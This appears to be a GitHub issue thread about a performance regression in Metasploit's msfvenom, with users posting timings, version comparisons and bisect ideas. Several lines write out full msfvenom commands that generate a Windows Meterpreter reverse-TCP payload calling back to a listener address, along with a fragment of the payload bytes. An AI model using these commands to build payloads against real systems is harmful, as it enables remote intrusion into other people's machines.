Closed exploiting-systems closed 1 year ago
I can't reproduce this issue on latest master branch. However, msfvenom
does take a very long time to generate the payload.
# time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f c
Payload size: 175686 bytes
Final size of c file: 740415 bytes
unsigned char buf[] =
[...]
real 5m57.343s
user 5m55.098s
sys 0m2.050s
# time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
Payload size: 175686 bytes
Final size of csharp file: 893104 bytes
byte[] buf = new byte[175686] {0x4d,0x5a,0xe8,0x00,0x00,
[...]
real 7m1.272s
user 6m58.255s
sys 0m2.274s
Looks like a regression in performance; Metasploit 5.0.101 completes in 5 seconds
./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 - 5.55s user 4.84s system 82% cpu 12.569 total
Would need to do a bisect to see where the issue has cropped up; I thought it might've been caused by https://github.com/rapid7/rex-text/pull/53 but that doesn't appear to be the case as the commit prior seems to be slow too.
"msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f c" has no output. It's the same issue with csharp
Kali Linux 2022.2 and 2022.3
I use Kali Linux 2022.1 to avoid this problem but then i can't update my system to newer versions
$ msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload